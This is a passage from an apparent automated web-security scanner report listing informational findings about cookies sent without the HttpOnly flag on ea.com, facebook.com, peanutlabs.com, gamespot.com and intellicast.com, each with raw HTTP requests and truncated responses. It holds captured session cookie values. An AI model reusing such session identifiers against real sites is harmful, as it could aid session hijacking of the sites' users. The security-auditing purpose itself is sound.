557C5059B093FDB80564 CA14D691772F16F2083B C8247835042071AB0E5E E05720064753CC7EA313 DAFB2493BDCE9D100F77 91BFE5D631D63157368D3863F ;MAX-AGE=600
Request
GET /js/iFrame/index.php Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Cache-control: no-cache="set-cookie" Content-Type: text/html Date: Sun, 09 Jan 2011 01:30:21 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache Set-Cookie: dob=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com Set-Cookie: sex=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com Set-Cookie: pl_email=deleted; expires=Sat, 09-Jan-2010 01:30:21 GMT; path=/; domain=.peanutlabs.com Set-Cookie: AWSELB=052955471CE77 Vary: Accept-Encoding,User Connection: keep-alive Content-Length: 112603 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- If ...[SNIP]... |
10.58. http://www.e00.peanutlabs.com/js/images/languages/icon_world.png previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.e00.peanutlabs |
Path: | /js/images/languages/icon |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- AWSELB=052955471CE77
557C5059B093FDB80564 CA14D6917E97B67B5A5E 4D3EB1494CA107BC4756 C9D1E7917A75869111F0 EAA4A056867F2254F716 FAB6B9BD336486E7AB4FDD4D1 ;MAX-AGE=600
Request
GET /js/images/languages/icon Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.e00.peanutlabs Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: max-age=604800, public Cache-control: no-cache="set-cookie" Content-Type: image/png Date: Sun, 09 Jan 2011 01:30:24 GMT ETag: "b603dc-332-495d459e78abb Expires: Thu, 15 Apr 2020 20:00:00 GMT Last-Modified: Wed, 24 Nov 2010 22:53:00 GMT Server: Apache Set-Cookie: AWSELB=052955471CE77 Vary: Accept-Encoding,User Connection: keep-alive Content-Length: 818 .PNG . ...IHDR..............H-.... ...,%A,T..5.....6..n......yn ...[SNIP]... |
10.59. http://www.e00.peanutlabs.com/recvMid.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.e00.peanutlabs |
Path: | /recvMid.php |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- AWSELB=052955471CE77
557C5059B093FDB80564 CA14D691772F16F2083B C8247835042071AB0E5E E05720064753CC7EA313 DAFB2493BDCE9D100F77 91BFE5D631D63157368D3863F ;MAX-AGE=600
Request
GET /recvMid.php?mid Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.e00.peanutlabs Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Cache-control: no-cache="set-cookie" Content-Type: text/html Date: Sun, 09 Jan 2011 01:30:25 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Server: Apache Set-Cookie: AWSELB=052955471CE77 Vary: Accept-Encoding,User Connection: keep-alive Content-Length: 13 mid=&update=1 |
10.60. http://www.ea.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | / |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- symfony=roj6d8htea48
u7e576mme7s3h2; path=/
Request
GET / HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:29 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=roj6d8htea48 Set-Cookie: displayCountrySelector Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39327 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.61. http://www.ea.com/hasbro previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /hasbro |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- symfony=t8hoe1ig0k16
bn396grb2ghf02; path=/
Request
GET /hasbro HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:29 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=t8hoe1ig0k16 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 70504 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.62. http://www.ea.com/ipad previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /ipad |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- symfony=27lnus2ntqri
v5k00j2k40ng93; path=/
Request
GET /ipad HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:44 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=27lnus2ntqri Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61969 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.63. http://www.ea.com/iphone previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /iphone |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- symfony=18e0qmhkmneo
fnmkng5qlhs1k4; path=/
Request
GET /iphone HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:42 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=18e0qmhkmneo Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 74885 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.64. http://www.ea.com/mobile previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /mobile |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- symfony=3f7u6pkb5ng2
3ddteumgngbv25; path=/
Request
GET /mobile HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:47 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=3f7u6pkb5ng2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71803 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.65. http://www.ea.com/platform/online-games previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/online-games |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- symfony=jbq0ai9k9l5t
598m4of0l22c32; path=/
Request
GET /platform/online-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:33 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=jbq0ai9k9l5t Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68051 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.66. http://www.ea.com/platform/pc-games previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/pc-games |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- symfony=402g5cpkl5kq
g8i27g71bepsl4; path=/
Request
GET /platform/pc-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:31 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=402g5cpkl5kq Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84317 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.67. http://www.ea.com/platform/ps3-games previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/ps3-games |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- symfony=4l4p40mas0vb
dpd6hs2fi6r4h4; path=/
Request
GET /platform/ps3-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:40 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=4l4p40mas0vb Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84808 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.68. http://www.ea.com/platform/xbox-360-games previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /platform/xbox-360-games |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- symfony=50refd00geb0
5if67umc20au74; path=/
Request
GET /platform/xbox-360-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:34 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=50refd00geb0 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84273 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.69. http://www.ea.com/wii previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ea.com |
Path: | /wii |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- symfony=4vsvrj360p5m
oup45jahp1d1l2; path=/
Request
GET /wii HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:41 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=4vsvrj360p5m Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71158 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.70. http://www.facebook.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | / |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- lsd=BqNeE; path=/; domain=.facebook.com
- reg_fb_gate=http%3A%2F
%2Fwww.facebook.com%2F; path=/; domain=.facebook.com - reg_fb_ref=http%3A%2F
%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F Set-Cookie: reg_fb_ref=http%3A%2F Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.71. http://www.facebook.com/2008/fbml previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /2008/fbml |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- lsd=zoSHS; path=/; domain=.facebook.com
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=zoSHS; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:15 GMT Content-Length: 11443 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.72. http://www.facebook.com/Pogo previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /Pogo |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- lsd=DGAoC; path=/; domain=.facebook.com
Request
GET /Pogo HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=DGAoC; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:26 GMT Content-Length: 29798 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.73. http://www.facebook.com/event.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /event.php |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- lsd=8aDVi; path=/; domain=.facebook.com
Request
GET /event.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=8aDVi; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:48 GMT Content-Length: 0 |
10.74. http://www.facebook.com/logout.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /logout.php |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- lsd=77KNI; path=/; domain=.facebook.com
Request
GET /logout.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=77KNI; path=/; domain=.facebook.com Set-Cookie: roadblock=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:18:12 GMT Content-Length: 0 |
10.75. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /pages/Packet-Storm |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- lsd=VcqBg; path=/; domain=.facebook.com
Request
GET /pages/Packet-Storm Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=VcqBg; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 27755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.76. http://www.facebook.com/peanutlabs previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /peanutlabs |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- lsd=WrbZx; path=/; domain=.facebook.com
Request
GET /peanutlabs HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=WrbZx; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:19:43 GMT Content-Length: 130584 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.77. http://www.facebook.com/sitetour/connect.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /sitetour/connect.php |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- lsd=4KsQr; path=/; domain=.facebook.com
Request
GET /sitetour/connect.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=4KsQr; path=/; domain=.facebook.com Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:17:22 GMT Content-Length: 0 |
10.78. https://www.facebook.com/login.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | https://www.facebook.com |
Path: | /login.php |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- lsd=tJ98F; path=/; domain=.facebook.com
- reg_fb_gate=https%3A%2F
%2Fwww.facebook.com %2Flogin.php; path=/; domain=.facebook.com - reg_fb_ref=https%3A%2F
%2Fwww.facebook.com %2Flogin.php; path=/; domain=.facebook.com
Request
GET /login.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ac4nTYEA6yNv1vk Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F Set-Cookie: reg_fb_ref=https%3A%2F Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 05:27:42 GMT Content-Length: 16799 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.79. http://www.gamespot.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.gamespot.com |
Path: | / |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- geolocn=MTczLjE5My4y
MTQuMjQzOjg0MDo2MjM%3D; expires=Tue, 08-Feb-2011 01:43:55 GMT; path=/; domain=.gamespot.com - ctk=NGQyOTEyZGJhZGMx
ZDZmMzEyMjkyNmUwMDViNQ%3D %3D; expires=Fri, 08-Jul-2011 01:43:55 GMT; path=/; domain=.gamespot.com
Request
GET / HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:43:55 GMT Server: Apache Accept-Ranges: bytes X-Powered-By: PHP/5.2.5 Set-Cookie: geolocn=MTczLjE5My4y Set-Cookie: ctk=NGQyOTEyZGJhZGMx Set-Cookie: gspot_promo_010811=1; expires=Wed, 12-Jan-2011 01:43:55 GMT; path=/; domain=.gamespot.com Set-Cookie: gspot_side_010811=1; expires=Wed, 12-Jan-2011 01:43:55 GMT; path=/; domain=.gamespot.com Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com Keep-Alive: timeout=300, max=994 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Content-Length: 98766 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.80. http://www.intellicast.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.intellicast |
Path: | / |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- NSC_jdbtu_efgbvmu_iuuq_wt
=44113c293660;expires=Sun , 09-Jan-11 02:10:47 GMT;path=/
Request
GET / HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:44:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: RecentLocations=@:; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Set-Cookie: Pop=0; path=/ Set-Cookie: vw=1; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 64747 Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_ctl00_Head1"> In ...[SNIP]... |
10.81. http://www.intellicast.com/Local/Weather.aspx previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.intellicast |
Path: | /Local/Weather.aspx |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- CityId=USMI0020; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
- RecentLocations=Alma, Michigan@USMI0020:; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
- NSC_jdbtu_efgbvmu_iuuq_wt
=44113c293660;expires=Sun , 09-Jan-11 02:10:47 GMT;path=/
Request
GET /Local/Weather.aspx Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:44:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: CityId=USMI0020; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Set-Cookie: RecentLocations=Alma, Michigan@USMI0020:; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Set-Cookie: Pop=0; path=/ Set-Cookie: vw=1; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 90725 Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_ctl00_Head1"> In ...[SNIP]... |
10.82. http://www.intellicast.com/Travel/CheapFlightsWidget.htm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.intellicast |
Path: | /Travel/CheapFlights |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- NSC_jdbtu_efgbvmu_iuuq_wt
=44113c293660;expires=Sun , 09-Jan-11 02:12:11 GMT;path=/
Request
